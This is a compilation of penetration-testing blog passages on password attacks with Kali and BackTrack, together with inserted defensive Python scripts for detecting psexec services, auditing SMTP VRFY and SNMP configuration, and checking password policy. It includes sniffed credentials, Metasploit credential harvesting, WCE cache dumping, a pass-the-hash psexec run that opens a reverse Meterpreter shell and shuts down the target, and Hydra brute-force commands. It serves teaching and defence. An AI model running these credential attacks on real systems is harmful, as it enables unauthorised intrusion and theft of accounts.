FTP : 192.168.34.140:21 -> USER: adminftp  PASS: $$up3rPasW0rsS3creT
PASS jaK3T0ftP.
FTP : 192.168.34.140:21 -> USER: Jake  PASS: jaK3T0ftP
PASS #pa$SW0rd>>ma1L2013!.
POP : 192.168.34.140:110 -> USER: albert  PASS: #pa$SW0rd>>ma1L2013!
PASS AAAAaaaa1.
POP : 192.168.34.140:110 -> USER: jasmine  PASS: AAAAaaaa1

This is why it is always better to use an SSL version of all protocols, also in internal communications.

If you have access to a PC, search for client programs like FileZilla or browsers and take note of the archived passwords using meterpreter, or search on the Internet where the client stores them:

msf  post(filezilla_client_cred) > exploit

[*] Parsing recentservers.xml
[*]  Collected the following credentials:
[*]  Server: 192.168.34.131:21
[*]  Protocol: FTP
[*]  Username: nina
[*]  Password: ninaanin

[*]  Collected the following credentials:
[*]  Server: 217.115.1.1:21
[*]  Protocol: FTP
[*]  Username: joy
[*]  Password: $$ecr3t12

[*]  Collected the following credentials:
[*]  Server: 217.115.1.2:21
[*]  Protocol: FTP
[*]  Username: admin
[*]  Password: FTPCr3dz1209

[*] Post module execution completed

Then use the ms-cache option of JtR or a program like Windows Credentials Editor that locates system cached passwords: if you are lucky a sysadmin has logged on, or some service is misconfigured and the password is stored (not encoded) in the cache.
In the following case study the user HP\Nina, present in the Domain Administrators group, is simply logged on. On this machine a misconfigured agent is present that uses the HP\administrator credential to work:

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Documents and Settings\nina>wce.exe -w
WCE v1.3beta (Windows Credentials Editor)
   by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

HP-SRV01$\HP:<contains-non-printable-chars>
nina\HP:ninaanin
Administrator\HP:password
C:\Documents and Settings\nina>

Note that the cached keys "ninaanin" and "password" are not encoded.

SMB pass-the-hash
As in the previous example, you will not always have to spend time on cracking operations. Sometimes you can use the hash you get as it is. OK, you can't take the string and just paste it in an authentication request window and log in using Remote Desktop, but there is a quite controversial feature in Windows in the authentication management of shared folders.

Consider this example:
Computer A has a c:\share and Computer B tries to connect to that share. B sends its credential in hash format ("hello! I am Administrator and my password is e52cac67419a9a224a3b108f3fa6cb6d") and A verifies whether it has this credential; if so it connects Computer B to the share. If not, it prompts for username and password.
All this process is in clear text!
So, what if Computer A is an attacker and has a network sniffer? It collects the Computer B hash! Now the attacker on Computer A can try to decode the hash, but not only that. He can use Metasploit, taking advantage of the pass-the-hash module, and own the B machine.
He uses the Administrator hash to connect to ADMIN$ of B and execute some code like a reverse shell. The SMB_relay exploit, present in Metasploit, has everything you need to test this Windows vulnerability: it creates a fake shared folder, captures the hash, pushes a payload and establishes a connection. Of course the pass-the-hash function can also be used with hashes previously collected:

root@kali:~# msfcli exploit/windows/smb/psexec RHOST=192.168.34.135 SMBuser=Administrator
SMBPass=E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C E

RHOST => 192.168.34.135
SMBuser => Administrator
SMBPass => E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
[*] Started reverse handler on 192.168.34.140:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.34.135:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \QxsHwGjv.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.34.135[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.34.135[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (OihQHhAa - "MZqTViuX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \QxsHwGjv.exe...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 1 opened (192.168.34.140:4444 -> 192.168.34.135:1534) at 2013-08-01 10:10:44 -0400

meterpreter > sysinfo
Computer        : HP-SRV01
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

meterpreter > shell
Process 3816 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>shutdown -s -t 00 -c "ByeBye!"
shutdown -s -t 00 -c "ByeBye!"

Do you still feel safe connecting to a network shared folder? So, if you have to secure a network, remember the users: enforce a strong domain policy, patch the systems, use SSL wherever you can, set different passwords for different services and, above all, educate the people.
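
From the defender's side, the psexec run above leaves a distinctive trail on the target: a service with a random 8-letter name (OihQHhAa) whose binary is a random 8-letter .exe dropped into ADMIN$ (QxsHwGjv.exe), created, started and removed within seconds. The following Python script is an added example (not part of the original post or of Metasploit) that flags such service installations in Windows System log events; the key=value rendering of the events and the field names are assumptions made for the example, and the sample events are constructed.

```python
"""Flag PsExec-style service installs in Windows System log events.

Added example (not from the original post). Each service the psexec module
creates on the target produces a Service Control Manager event 7045
("A service was installed in the system"), which makes that event one of
the most reliable places to detect this technique. The event lines below
are constructed in a simplified key=value rendering; field names are an
assumption chosen for readability.
"""
import re
from collections import namedtuple

Event = namedtuple("Event", "time event_id service image")

# Constructed sample of System log events (7045 = service installed,
# 7036 = service state change). Backslashes are doubled for the Python string.
SAMPLE_EVENTS = """\
2013-08-01T10:10:40 EventID=7045 ServiceName=OihQHhAa ImagePath=%SystemRoot%\\QxsHwGjv.exe
2013-08-01T10:12:03 EventID=7045 ServiceName=Spooler ImagePath=%SystemRoot%\\system32\\spoolsv.exe
2013-08-01T10:15:22 EventID=7045 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe
2013-08-01T10:20:00 EventID=7045 ServiceName=BackupAgent ImagePath=C:\\Program Files\\Backup\\agent.exe
2013-08-01T10:21:11 EventID=7036 ServiceName=OihQHhAa ImagePath=-
"""

LINE_RE = re.compile(
    r"^(?P<time>\S+) EventID=(?P<id>\d+) ServiceName=(?P<svc>\S+) ImagePath=(?P<img>.*)$")
RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")   # e.g. OihQHhAa, QxsHwGjv
KNOWN_TOOLS = {"PSEXESVC"}                    # Sysinternals PsExec default service name
# Binary dropped directly into the Windows directory root, which is what ADMIN$ maps to.
WINDIR_ROOT = re.compile(r"^(%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$", re.IGNORECASE)


def parse_events(text):
    """Parse the constructed key=value lines into Event tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(Event(m["time"], int(m["id"]), m["svc"], m["img"].strip()))
    return events


def suspicious_service_installs(text):
    """Return (service, image, reasons) for 7045 events that look like remote-exec tooling."""
    findings = []
    for ev in parse_events(text):
        if ev.event_id != 7045:
            continue
        reasons = []
        basename = ev.image.split("\\")[-1]
        if ev.service in KNOWN_TOOLS:
            reasons.append("known remote-execution service name")
        if (RANDOM_NAME.match(ev.service) and basename.lower().endswith(".exe")
                and RANDOM_NAME.match(basename[:-4])):
            reasons.append("random 8-letter service and binary name")
        if WINDIR_ROOT.match(ev.image):
            reasons.append("binary dropped into the Windows directory root (ADMIN$)")
        if reasons:
            findings.append((ev.service, ev.image, reasons))
    return findings


if __name__ == "__main__":
    for service, image, reasons in suspicious_service_installs(SAMPLE_EVENTS):
        print(f"{service}: {image}\n  " + "\n  ".join(reasons))
```

The legitimate Spooler and BackupAgent installs are not reported because their binaries live in proper subdirectories and have ordinary names; the random-name heuristic alone is enough to catch the Metasploit run above, and the known-name check catches the Sysinternals tool it imitates. In practice you would also correlate the 7045 event with the NTLM network logon (event 4624, logon type 3) that precedes it.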

The Password Attacks on Kali Linux. [Part 1]
https://www.gosecure.it/blog/art/391/sec/the-password-attacks-on-kali-linux-part-1/
Fri, 27 Sep 2013 15:49:42 +0000

This is a part of my article “The Password Attacks on Kali Linux” published on PenTest Magazine.
I have the right to do up to 100 downloads of that magazine, so if you are interested you can download PenTest Extra 04_2013 for free using the following link. The only thing you need is a free registration.
PenTest Extra 4_2013

The Password Attacks on Kali Linux [Part 1]

What is the weakest link in the security chain? You know the answer: the one who sits between the keyboard and the desk chair. And what does this user do on her/his first day at work? Set a password. Yes, a big part of our security environment revolves around that password.

Of course we are talking about internal passwords, because network administrators have learned the lesson well and secure their external accounts with encryption, strong policies and access restrictions; in spite of this, internal accounts are heaven for hackers (and hell for sysadmins).
Nowadays internal users are, fortunately, low-privileged and some kind of policy enforces a little security, but even if your policy requires more than 8 characters with numbers, upper and lower case, there will be a user who sets a password like AAAAaaaa1 or Password1.

The complete takeover of a network is a stairway that goes through information gathering, network discovery, password cracking and system owning. Finding a low-privilege password is one step up, and it is actually one of the biggest gaps a penetration tester has to cross. If you find a password, you can quickly test it on other systems and services discovered previously (SSH, FTP, mail): users have the bad habit of using the same keyword for different services.
When you discover a password, you can form an idea of the company's security policy and try a widespread brute-force attack. If you find, for example, a key of 8 characters, all lower case, you can try an attack with this setting on all systems of the LAN. Even if the keyword you find belongs to a user who isn't administrator or root, there are lots of well-known privilege escalations that can be attempted, especially on old or unpatched systems.
Other options that can be used, once you own a PC with an unprivileged account, are sniffing traffic, extracting stored credentials or pivoting to other attacks. All these things lead you further and further up the stairway. In short, a correct user-password association is one of the core successes of a pentest, and it all hinges on a user and the password he chose on his first day at work.

Some terms
Let's start with a clarification. There are two common names you hear when talking about password attacks: BruteForce and WordList.
Brute force is when the password is tested using all the designated characters at a set length. For example: use the characters 'a' and 'b' and set length 2. The passwords tested are aa, bb, ab and ba; that is 4 tries. You can calculate the number of attempts as the number of characters raised to the length used, in this case 2^2=4. Because it is exponential, it can become very difficult to test something with ten characters using the full ASCII set: according to the Password time calculator by lastbit.com this BruteForce attack would take up to 4274902 years.
The other kind is not a BruteForce attack but a WordList one, where the keys used are all the single words present in a list.
Note that the password tried is exactly as written in the list. So if the document contains the word 'backup', only this word will be tested, not 'Backup' or 'back-up'; fortunately there are programs that make these permutations automatically.
So wordlists are often a smarter attempt than a bruteforce attack; in spite of this, during a pen test you must have a very strong reason to spend hours on this kind of attack.
Of course the following password attacks are done using Kali Linux, because it has every tool you'll need. Thanks to Offensive Security, Kali Linux, like its father BackTrack, is one of the most used pentesting distributions. If you are reading this, you know what we are talking about.

Create your user and password list
To perform a wordlist attack you need, of course, a list of words. There are many techniques to create one, and many places where you can find a precompiled one, but the best way is to create a document based on your needs. In my opinion, in this case, it is necessary to start by locating valid usernames on the network I'm testing and using these as a first simple list, trying a blank password, the username as password or very simple passwords.
theHarvester, by Edge-Security Research, is a very useful tool that helps you by searching for a company name in various resource databases (Google, Linkedin, PGP, Bing...) and then extracts probable user names for you. In Figure 1 you can see the result of a search: maybe vdiaz, cdelojo and cmartorella are also FTP, SSH or RDP users.
Then you can try to locate some useful accounts from the company website: e-mails and documents such as PDFs, DOCs or similar can be downloaded to gain such information. You can automate the operation with another tool by Edge-Security Research: metagoofil (see Figure 2).

Figure 1: theHarvester is very useful in user discovery

Figure 2: The Metagoofil report

Another way to find usernames, when you are in the tested company's LAN, is to locate a mail server and an SNMP service. A mail server can be vulnerable to the VRFY command, which you can use to probe the system for login names. VRFY is a legitimate command and fortunately, in modern systems, it is disabled to close this security issue, but sometimes you can still use it. Let's look at how it works using a simple Netcat connection:

root@kali:~# nc -nv mailserver.fakesite.lab 25
(UNKNOWN) [10.0.7.14] 25 (smtp) open
220 mailserver.fakesite.lab ESMTP Sendmail 8.13.7
VRFY freddie
550 5.1.1 freddie... User unknown
VRFY root
250 2.1.5 root <root@fakesite.lab>
VRFY test
550 5.1.1 test... User unknown

If the system is vulnerable, the smtp-user-enum program can be used to get some usernames; the following is the basic command:

root@kali:~# smtp-user-enum -M VRFY -U users.txt -t 10.0.7.14

Note that the option -U takes a wordlist of names to try. If you don't have one you can find some preloaded in Kali using a command like this:

root@kali:~# find / | grep users.txt

However the suggestion is to keep your list under 100-150 names. Smtp-user-enum can also be used to test the EXPN function; EXPN is similar to VRFY, but it is used on distribution lists and lists all their members. This can be a bigger problem than VRFY since sites sometimes have an alias such as “all”.
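
The defender's version of the Netcat session above is to check your own mail servers the same way and confirm they no longer distinguish existing from non-existing users. The Python below is an added example (not from the post or from smtp-user-enum) that sends a VRFY for a name that must exist (postmaster, required by RFC 5321) and one that cannot, classifies the reply codes, and reports whether the two differ in a way that leaks user existence; the host name in the usage is a placeholder.

```python
"""Audit a mail server for VRFY/EXPN user enumeration.

Added example (not from the original post). The Netcat transcript above
shows the leak: 250 confirms a user, 550 denies one. A hardened MTA replies
252 ("cannot VRFY user, but will accept message") or 500/502 ("command not
implemented") to every name, so an attacker learns nothing. Only
audit_vrfy() touches the network; the classification is pure and is what
the checks below exercise.
"""
import smtplib


def parse_reply_line(line):
    """Extract the 3-digit reply code from a raw SMTP response line."""
    return int(line.strip()[:3])


def classify_reply(code, message=b""):
    """Map an SMTP reply code to an audit verdict."""
    if code in (250, 251):
        return "confirms"      # address accepted as real
    if code in (550, 551, 553):
        return "denies"        # address rejected as unknown
    if code == 252:
        return "disabled"      # RFC 5321 recommended non-answer
    if code in (500, 502):
        return "rejected"      # command not implemented / disabled outright
    return "other"


def leaks_user_existence(known_verdict, bogus_verdict):
    """True when a name that must exist and a name that cannot get replies
    that differ and at least one of them is a definite confirm/deny.
    A server that answers 252 (or 502) to both leaks nothing; a server that
    says 250 to everything leaks nothing either."""
    return (known_verdict != bogus_verdict
            and bool({"confirms", "denies"} & {known_verdict, bogus_verdict}))


def audit_vrfy(host, port=25, known="postmaster", bogus="zz-no-such-user-zz"):
    """Connect to an MTA you own and report its VRFY/EXPN behaviour."""
    with smtplib.SMTP(host, port, timeout=10) as smtp:
        smtp.ehlo_or_helo_if_needed()
        known_verdict = classify_reply(*smtp.verify(known))
        bogus_verdict = classify_reply(*smtp.verify(bogus))
        expn_verdict = classify_reply(*smtp.expn("all"))   # alias 'all' per the text
    return {
        "known": known_verdict,
        "bogus": bogus_verdict,
        "expn_all": expn_verdict,
        "leaks": leaks_user_existence(known_verdict, bogus_verdict),
    }


if __name__ == "__main__":
    # Placeholder host: replace with a mail server you are authorised to audit.
    print(audit_vrfy("mailserver.example.lab"))
```

Applied to the transcript above, the replies to "root" (250) and "freddie" (550) classify as confirms and denies, which the check reports as a leak; a server answering 252 to both passes. The EXPN probe for the "all" alias is included because, as the text says, a distribution list is a bigger leak than a single name.
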
Another way to compile your focused user list is SNMP analysis. SNMP is a protocol based on UDP that is often used to monitor servers' service status.
The community strings (the protocol's authentication) are passed in the clear and are often left at the default (public or private), so you can easily try to find them in order to query the server and get plenty of information.
You can use a combination of Onesixtyone and Snmpcheck; the first is used to enumerate community strings, so, after identifying the hosts with an SNMP service, the program can be run.

root@kali:~# onesixtyone -c /usr/share/doc/onesixtyone/dict.txt -i /tmp/host-snmp.txt

dict.txt is another wordlist, of possible community strings, and it is already present in Kali; host-snmp.txt is a file with the IPs of all the hosts in the network with the SNMP service active. The word in square brackets (see Figure 3) is what you are looking for, and the next step is to use it with Snmpcheck to extract data from the service.

Figure 3: OneSixtyOne

root@kali:~# snmpcheck -t 192.168.34.135 -c admin | grep -a "User accounts" -A 11
[*] User accounts
-----------------
Administrator
Guest
IUSR_HP-SRV01
IWAM_HP-SRV01
SUPPORT_388945a0
albert
krbtgt
jodie
user
expert

In this example the output is limited to the user accounts (grep -a "User accounts" -A 11), but you can get much more info using SNMP, such as running processes, installed programs, open ports, network and routing configuration, storage information and much more.

There are several ways to find a username on the net: if something like PC-pedro or Maria's MacBook is found, the assumption is that Pedro and Maria are likely usernames with access to these computers. It's important to compile the user list meticulously and add every possible username you find, so you can use it later.

Finally you have a user list that will help you in a first simple password attack.
If you get no results you may want to make some simple extensions to that list using John the Ripper (JtR), or try another small wordlist like /usr/share/john/password.lst; in this case too JtR can be used to make some small changes.
Let's see some uses of the John the Ripper password cracker by Openwall. Note that this program does far more than what you'll read here. You will now see how to make some simple mutations in order to upgrade your user list and use it as a password list.
The idea is to create something that leads from an input such as 'root' to outputs like Root, ROOT, rootroot, toor, Root1 and so on. Well, let's expand a small file (wordlist.lst) containing only 'root' and 'password':

root@kali:~# john -w=wordlist.lst --rules --stdout | tr -s '\n' ' '
words: 100  time: 0:00:00:00 100%  w/s: 10000  current: Passwording
root password Root Password roots passwords root1 password1 Root1 Password1 rootroot toor drowssap 1root 1password ROOT PASSWORD root2 password2 root! password! root3 password3 root7 password7 root9 password9 root5 password5 root4 password4 root8 password8 root6 password6 root0 password0 root. password. root? password? psswrd RootRoot tooR drowssaP Toor Drowssap roottoor rooT passworD 2root 2password 4root 4password Root2 Password2 Root! Password! Root3 Password3 Root9 Password9 Root5 Password5 Root7 Password7 Root4 Password4 Root6 Password6 Root8 Password8 Root. Password. Root? Password? Root0 Password0 3root 3password 7root 7password 9root 9password 5root 5password 6root 6password 8root 8password Roots Passwords rooted passworded rooting passwording Rooted Passworded Rooting Passwordin

In this case the default rule set is used (--rules), but you can modify it in /etc/john/john.conf; note that from 2 words JtR generates 100 words instantly.
The output is normalized here using tr -s '\n' ' ', but you can remove that part of the command and redirect everything to a file that fits your needs. Later, talking about offline attacks, you'll come across JtR again and find some other awesome features. Even though, in my opinion, using a huge wordlist is not a good idea, it can be useful to know how to make one, so here are two great tools.
The first is CeWL; you can use it to crawl a company web site, extract words and convert them into a list. The basic usage is very simple and the impact awesome:

cewl www.fakesitelab.com > /tmp/wordlist.txt

You can even use it to extract usernames by pointing CeWL at sites that collect popular birth names. Similarly you can use it to create monothematic wordlists: animals, plants, countries, cars, “Lord of the Rings”, topic words and so on.
The point I'd like to stress is that in an online password attack you are connected to the LAN: you generate network traffic, you stress systems and you can't stay there all night and day long.
The second tool is Crunch. It can be used to create a wordlist too, but starts from a different point of view than CeWL. Crunch is more like a bruteforce: it generates all words according to the parameters you set. Essentially you establish min and max length and a charset (or use the default one); so you can create all possible combinations of the characters a, b, c with length from 2 to 4 using the following command:

root@kali:~# crunch 2 4 abc

More specific and interesting usage can be read in the manual page, for example the -t option: you can take one word and append some characters to it:

@@god@@@@ where only the @'s, ,'s, %'s, and ^'s will change.
@ will insert lower case characters
, will insert upper case characters
% will insert numbers
^ will insert symbols

The output can be sent to the screen, to a file, or to another program; this last option allows Crunch to be used directly in an online/offline cracking operation without physically generating a wordlist, saving disk space.
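
Seen from the policy side, the two ideas above (the 2^2=4 keyspace calculation and the JtR/crunch mutation and mask rules) are exactly what a password policy should evaluate before accepting a password. The Python below is an added example, not code from the post or from John the Ripper or crunch: keyspace_of_mask generalises the exponent calculation to crunch's -t mask notation, and is_trivial_mutation reproduces a small subset of the JtR rules so that Password1 or toor can be rejected even though they satisfy a character-class rule. The symbol set, the mutation subset, the variety rule and the sample dictionary are this example's own assumptions.

```python
"""Estimate how resistant a password is to the attacks described above.

Added example (not from the original post, JtR or crunch). Two checks a
password policy can apply before accepting a password:
  1. keyspace_of_mask(): how many candidates a brute force of a given shape
     must try, in crunch -t notation (@ lower, , upper, % digit, ^ symbol,
     anything else fixed), plus the time that takes at a guess rate.
  2. is_trivial_mutation(): whether the candidate is a simple JtR-style
     mutation of a dictionary word (case changes, doubling, reversal, one
     digit or symbol added), which is why Password1 passes an "8 chars,
     mixed case, one digit" rule and still falls instantly.
Symbol set, mutation subset and variety rule are assumptions of this example.
"""
import string

CHARSETS = {
    "@": 26,                        # lower case letters
    ",": 26,                        # upper case letters
    "%": 10,                        # digits
    "^": len(string.punctuation),   # 32 printable ASCII symbols (assumed set)
}
DIGITS_AND_SYMBOLS = string.digits + "!.?"   # suffixes seen in the JtR output above


def keyspace_of_mask(mask):
    """Number of candidates the mask generates; fixed characters count once."""
    total = 1
    for ch in mask:
        total *= CHARSETS.get(ch, 1)
    return total


def keyspace_of_bruteforce(charset_size, min_len, max_len):
    """Candidates for every length in [min_len, max_len], e.g. crunch 2 4 abc."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def seconds_to_exhaust(candidates, guesses_per_second):
    """Worst-case time to try every candidate at the given rate."""
    return candidates / guesses_per_second


def simple_mutations(word):
    """Small subset of the JtR default rules shown in the output above."""
    base = {word, word.lower(), word.upper(), word.capitalize(),
            word[::-1], word[::-1].capitalize(), word + word,
            word[:-1] + word[-1].upper()}          # e.g. passworD
    out = set(base)
    for w in base:
        for s in DIGITS_AND_SYMBOLS:
            out.add(w + s)                         # root1, password!
            out.add(s + w)                         # 1root
    return out


def is_trivial_mutation(candidate, dictionary):
    return any(candidate in simple_mutations(word) for word in dictionary)


def passes_policy(candidate, dictionary, min_len=8):
    """Character-class rule from the text plus variety and mutation checks."""
    complexity = (len(candidate) >= min_len
                  and any(c.islower() for c in candidate)
                  and any(c.isupper() for c in candidate)
                  and any(c.isdigit() for c in candidate))
    variety = len(set(candidate.lower())) >= 5     # assumed rule: rejects AAAAaaaa1
    return complexity and variety and not is_trivial_mutation(candidate, dictionary)


if __name__ == "__main__":
    words = ["root", "password"]
    print("@@god@@@@ keyspace:", keyspace_of_mask("@@god@@@@"))
    print("crunch 2 4 abc lines:", keyspace_of_bruteforce(3, 2, 4))
    for pw in ("Password1", "AAAAaaaa1", "toor", "Tr0ub4dor&3"):
        print(pw, "->", "ok" if passes_policy(pw, words) else "rejected")
```

A policy built this way rejects Password1 and AAAAaaaa1 (both satisfy "8+ characters, mixed case, one digit") while accepting a long, varied password; the keyspace figure tells you how many guesses an attacker who has inferred your users' pattern needs, which is a better measure of strength than length alone.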

Online Password Attack
One of the best tools to complete the online attack is Hydra. This program's task is to join your lists and perform the attack over a network service.
Figure 4 explains how it works: it puts together a username list, a password list and a host list split by the service to attack (FTP, RDP, SSH, MySQL...).
Then it starts to try every username and password combination on every host. Some other parameters can be set, such as a proxy or the number of tasks; very useful when attacking some cranky service like RDP.

Figure 4: An operation diagram of THC-Hydra

The following is the command that performs a wordlist attack against all FTP hosts in the network:

root@kali:~# hydra -s 21 -V -L /tmp/users.txt -P /tmp/passwords.txt -e nsr -t 16 -M /tmp/FTP_hosts.txt ftp

The -L, -P and -M options point to the wordlists of users, passwords and hosts and can be replaced by -l, -p and an IP to use a single name, password or target. -s is the port to attack and the ftp at the end is the target service. -V stands for verbose and the -e option tries n (null password), s (login as password) and/or r (reversed login). Finally -t is the number of tasks Hydra will use.
The simplest way to learn how to use this tool is to take a look at its GUI, xHydra (see Figure 5).

Figure 5: xHydra

Hydra is the (maybe happy) end of the online password attack, but it is no more than a task executor. Its strength lies in the wordlists you are able to create; don't forget this.

[end of part 1]

Penetration Test – Gathering Phase. [Part 2]
https://www.gosecure.it/blog/art/333/sec/penetration-test-ghatering-phase-part-2/
Tue, 13 Aug 2013 07:59:54 +0000

This is a part of my article “Sharpen your axe with BackTrack – Gathering phase” published on PenTest Magazine and Hakin9 magazine. I have the right to do up to 100 downloads of these magazines, so if you are interested you can download PenTest Extra BackTrack Compendium 03_20132 or Hakin9 starter kit 03_20131 for free using the 2 following links. The only thing you need is a free registration.
–   PenTest Extra Compendium
–   Hakin9 Starter kit.
–   PenTest OPEN 06/2013.

Sharpen your axe with BackTrack – Gathering phase [Part 2]

Find your account
As with hosts, user discovery can be done in many ways. You can search Google for email accounts of your target company, explore corporate web pages looking at PDF or Word documents and who created them; if you have access to the LAN you are testing, you can try to get information from the SNMP or SMTP protocols. Below are some scripts and programs present in BT that will help you.
theHarvester, by Edge-Security Research, is a very useful one. It searches for a company name in various resource databases (Google, Linkedin, PGP, Bing) and can be used to extract probable usernames. In Figure 5 you can see the result of a search: maybe vdiaz, cdelojo, cmartorella, and xmendez are also FTP, SSH or RDP users.
Again from Edge-Security.com, you can use metagoofil (/pentest/enumeration/google/metagoofil/) to try to find the users who created documents, such as DOCs or PDFs, downloadable from the domain you point it at.

Figure 5: Maybe we have found some accounts

As well as using web search to catch company users' names/usernames, you can try to obtain information via SNMP or SMTP.
SNMP is a protocol based on UDP that is often used to monitor server service status. The authentication tokens (community strings) are passed in the clear and are often left at the default (public or private), so you can easily try to find them in order to get plenty of information.
You can use programs such as Snmpenum and Onesixtyone for this. Let's see how they work.
Initially you have to use Onesixtyone to enumerate community strings; with the info collected before, make a list of hosts and write it to a file (/tmp/hosts.txt), then go to pentest/enumeration/snmp/onesixtyone and do the following:

root@bt:pentest/enumeration/snmp/onesixtyone# ./onesixtyone -c dict.txt -i /tmp/hosts.txt -o /tmp/log.txt

In this command you use the file dict.txt, already present in the onesixtyone folder, to 'brute force' the community strings; you use the hosts file you built before to set the targets and, at the end, write a log file.
In Figure 6 you can find a sample of what you can get. In the sample you see some printers, some switches and a server (192.168.1.10).

Figure 6: Onesixtyone log

Go on and use snmpenum on 192.168.1.10, setting 'public' as community string and the windows.txt template (already present) to merge the output information (see Figure 7).

Figure 7: Snmpenum at work

This is just a sample, but you can get much more information than this using SNMP. You can find running processes, open ports, system information and much more.
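
The onesixtyone runs described here and in the SNMP section of "The Password Attacks on Kali Linux" succeed because agents are left with the default community strings and answer any source address. The Python below is an added example (not from either post or from Net-SNMP) that audits an snmpd.conf for those two weaknesses plus v1/v2c write access; the weak and hardened configuration texts are constructed, and the directive syntax follows Net-SNMP's rocommunity/rwcommunity/com2sec lines.

```python
"""Audit snmpd.conf for what onesixtyone exploits: default community
strings and communities usable from any source address.

Added example (not from either post or from Net-SNMP). Directive syntax
follows Net-SNMP:
    rocommunity COMMUNITY [SOURCE [OID | -V VIEW]]
    rwcommunity COMMUNITY [SOURCE [OID | -V VIEW]]
    com2sec     NAME SOURCE COMMUNITY
WEAK_CONF and HARDENED_CONF are constructed for the example.
"""
import shlex

DEFAULT_COMMUNITIES = {"public", "private"}
V2_DIRECTIVES = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6", "com2sec"}

WEAK_CONF = """\
# constructed: what a default install often looks like
rocommunity public
rwcommunity private
com2sec readonly default public
"""

HARDENED_CONF = """\
# constructed: SNMPv3 user with authentication and privacy, no v1/v2c
rouser monitor priv
# if v2c cannot be avoided: long random string, one allowed source, restricted view
rocommunity Xk9-long-random-string 10.0.7.2/32 -V systemonly
view systemonly included .1.3.6.1.2.1.1
"""


def parse_snmpd_conf(text):
    """Yield (directive, args) for every non-comment, non-empty line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = shlex.split(line)
        yield parts[0].lower(), parts[1:]


def audit_snmpd_conf(text):
    """Return (directive, community, problem) for each weakness found."""
    findings = []
    for directive, args in parse_snmpd_conf(text):
        if directive not in V2_DIRECTIVES or not args:
            continue
        if directive == "com2sec":
            _name, source, community = (args + [None, None, None])[:3]
        else:
            community = args[0]
            source = args[1] if len(args) > 1 else "default"
        if community in DEFAULT_COMMUNITIES:
            findings.append((directive, community, "default community string"))
        if source in (None, "default"):
            findings.append((directive, community, "no source address restriction"))
        if directive.startswith("rw"):
            findings.append((directive, community, "write access over v1/v2c"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_snmpd_conf(conf) or "no findings")
```

The weak configuration is reported seven times (default strings, open source restriction on every line, and read-write access over v2c); the hardened one is clean because v1/v2c is either absent or limited to one source and a read-only view. The dict.txt that onesixtyone ships is a useful input for the DEFAULT_COMMUNITIES set on a real deployment.
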
For now, limit yourself to the users. What you want is to create a document like hosts.txt but with possible user names.
There are many other methods to identify users, such as using the SMTP server (smtpscan) and testing the VRFY functionality (smtp-user-enum). Spidering a target website to collect unique words (/pentest/password/cewl) or sniffing network traffic (Wireshark) can also be useful. In the Backtrack > Information Gathering > Network analysis menu you can find many tools to reach your goal. Try to find as many names as you can, but do not forget to add the most common user names (root, admin, administrator) to your list.

Map the NET
Let's have a look at network scanners, limiting ourselves to a simple scan, with the only objective of finding some services that can be used as targets.
Please keep in mind that scanners are much more than what you will read here.
Of course NC can be used as a network scanner, but the best programs are Unicornscan and Nmap, so let's start with the first one. The commands in Figure 8 perform a simple scan, pointing at a single target (192.168.34.135), testing common TCP (-m T) and UDP (-m U) ports, typically those used by common services such as FTP, SSH, SMB, MySQL. The last command in Figure 8 is a scan of the whole subnet 192.168.34.*, but only on the FTP, SSH, SMB and RDP ports.

Figure 8: Some basic scans using Unicornscan

You can do the same thing using Nmap. The command nmap 192.168.34.135 scans the common TCP ports; if you add the -sU option it will scan UDP ports. The single target can be replaced with 192.168.34.*, 192.164.34.0/24 or your hosts.txt to explore the whole subnet or specific IPs; adding the option -p 21-23,3389 you will limit the scan to ports 21, 22, 23 and 3389. The result will probably be the same, but if you try Nmap you will see more information. In addition, it can quickly be used to determine what kind of program is listening on the discovered port (-sV) and what operating system is installed (-O). Please take a look at the Nmap help to learn more options, and remember that the man command and help are always your friends. If you are afraid of the Terminal, use the Nmap GUI: Zenmap.
You have to remember that every GUI is at least one layer above its command-line program; anyway, let's use the graphical interface of Nmap and try to find FTP, SSH, Telnet and RDP services in the subnet (Figure 9).
Scanners give you a list of hosts running FTP, another of hosts running RDP, and so on.

Figure 9: Nmap GUI

Get the Keys
Well done! You have completed your basic network gathering phase; now you can merge all your lists and launch your first attack. What do you need? A username list, a file listing the hosts with the specific service, a password list, and a program to put everything together. You don't have the password list, but one can easily be found in the folder /pentest/password/wordlist/ or by a search on the web. The kind of attack you will do is called a 'wordlist attack': it is not the most elegant way to perform a penetration test, but it may be very incisive.
The program you can use to join your lists is Hydra (or its GUI xHydra). Figure 10 explains how it works.
Open the Hydra GUI (Privilege Escalation > Password Attacks > Online Attacks > Hydra-gtk) and, in the Target tab, insert the target list (e.g. FTP_hosts.txt), the port to test and the protocol (21 / FTP).

Figure 10: An operation diagram of THC-Hydra

